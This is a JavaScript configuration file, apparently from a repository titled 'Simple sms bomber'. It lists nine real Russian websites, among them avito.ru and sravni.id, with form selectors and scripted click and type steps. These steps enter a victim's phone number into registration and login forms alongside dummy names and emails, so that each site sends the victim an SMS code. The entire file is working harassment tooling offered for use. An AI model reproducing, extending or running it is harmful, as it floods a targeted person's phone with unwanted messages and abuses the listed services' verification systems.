penaplast3104-sms-bomber
Version:
Simple sms bomber
217 lines (216 loc) • 6.96 kB
JavaScript
const defaultSites = [
{
url: 'https://moscow.nadommebel.com/',
queue: [
{
selector: '#header > div.header-wrapper.header-v17 > div > div > div.header__top-inner > div.right-icons1.long_search.wb.header__top-item > div > div > a',
action: 'click',
},
{
selector: '#bxmaker-authuserphone-enter__uB8qD7 > div.bxmaker-authuserphone-enter-auth > div.bxmaker-authuserphone-enter-auth__toregistration > a',
action: 'click',
},
{
selector: '#bxmaker-authuserphone-enter__uB8qD7 > div.bxmaker-authuserphone-enter-reg > div.bxmaker-authuserphone-enter-reg-form > div.bxmaker-authuserphone-input-fio > div.bxmaker-authuserphone-input-fio__field > div > input[type=text]',
action: 'type',
value: 'Йцуке Йуцун Йцукн'
},
{
selector: '#bxmaker-authuserphone-enter__uB8qD7 > div.bxmaker-authuserphone-enter-reg > div.bxmaker-authuserphone-enter-reg-form > div:nth-child(3) > div > input[type=text]',
action: 'type',
value: 'qwerty@mail.ru'
},
{
selector: '#bxmaker-authuserphone-enter__uB8qD7 > div.bxmaker-authuserphone-enter-reg > div.bxmaker-authuserphone-enter-reg-form > div:nth-child(2) > div > input[type=tel]',
action: 'type',
isNumber: true,
},
{
selector: '#bxmaker-authuserphone-enter__uB8qD7 > div.bxmaker-authuserphone-enter-reg > div.bxmaker-authuserphone-enter-reg-form > button',
action: 'click'
}
]
},
{
url: 'https://mebel169.ru/',
queue: [
{
selector: '#header-main > div > div.user-bar > div:nth-child(1) > a',
action: 'click',
delay: 500,
},
{
selector: '#auth-phone',
action: 'type',
isNumber: true,
},
{
selector: 'button[type="submit"]',
action: 'click'
}
]
},
{
url: 'https://sravni.id/signin',
options: {
withoutFirstNumber: true,
},
queue: [
{
selector: 'input[name="phone"]',
action: 'type',
isNumber: true,
},
{
selector: 'button[type="submit"]',
action: 'click'
}
]
},
{
url: 'https://www.avito.ru/#registration',
options: {
withoutFirstNumber: true,
},
queue: [
{
selector: '#registration-choosing-type\\/button-personal',
action: 'click',
},
{
selector: 'input[name="username"]',
action: 'type',
isNumber: true,
},
{
selector: 'button[type="submit"]',
action: 'click'
}
]
},
{
url: 'https://promofaberlic.com/733268607',
options: {
withoutFirstNumber: true,
},
queue: [
{
selector: '#regform-surname',
action: 'type',
value: 'Qwerty'
},
{
selector: '#regform-name',
action: 'type',
value: 'Qwerty'
},
{
selector: '#regform-patronymic',
action: 'type',
value: 'Qwerty'
},
{
selector: '#regform-birthday',
action: 'type',
value: '01012001'
},
{
selector: '#regform-email',
action: 'type',
value: 'mail@gmail.ru'
},
{
selector: '#regform-phone',
action: 'type',
isNumber: true,
},
{
selector: 'button[type="submit"]',
action: 'click'
}
]
},
{
url: 'https://client.persona.aero/login',
options: {
withoutFirstNumber: true,
},
queue: [
{
delay: 1000,
selector: '#__layout > div > section > form > div.g-form-line > div > div.control.is-clearfix > input',
action: 'type',
isNumber: true,
},
{
selector: 'button[type="submit"]',
action: 'click'
}
]
},
{
url: 'https://msk.nonton.ru/',
options: {
withoutFirstNumber: true,
},
queue: [
{
selector: 'body > header > div > div.h-fix.h-loaded > div > div.h-fix__inner > div > div.h__wrap > div.h__actions > a.h__action.h__action--lk',
action: 'click',
},{
selector: '#LOGIN',
action: 'type',
isNumber: true,
},
{
selector: 'button[type="submit"]',
action: 'click'
}
]
},
{
url: 'https://www.triya.ru/',
options: {
withoutFirstNumber: true,
},
queue: [
{
selector: '#__layout > div > header > div.black-header > div > a.personal-button',
action: 'click',
},
{
selector: '#__layout > div > header > div.control-block > div.vue-portal-target > section > div > div > form > div.btn-block.form-container > div > div.input-container > input',
action: 'type',
isNumber: true,
},
{
selector: '#__layout > div > header > div.control-block > div.vue-portal-target > section > div > div > form > div.btn-block.st1 > button.btn.red',
action: 'click'
}
]
},
{
url: 'https://hypermarketmebel.ru/',
options: {
withoutFirstNumber: true,
},
queue: [
{
selector: '#header > div.l-head > div.l-head-bar.l-head-flex > div > div.profile-informer.profile-informer_loaded > div > div',
action: 'click',
},
{
selector: '#identification-form > div.window__field > div.input.input_margin.input_mobile > input',
action: 'type',
isNumber: true,
},
{
selector: '#identification-form > div.window__submit',
action: 'click'
}
]
},
]
module.exports = {
defaultSites
}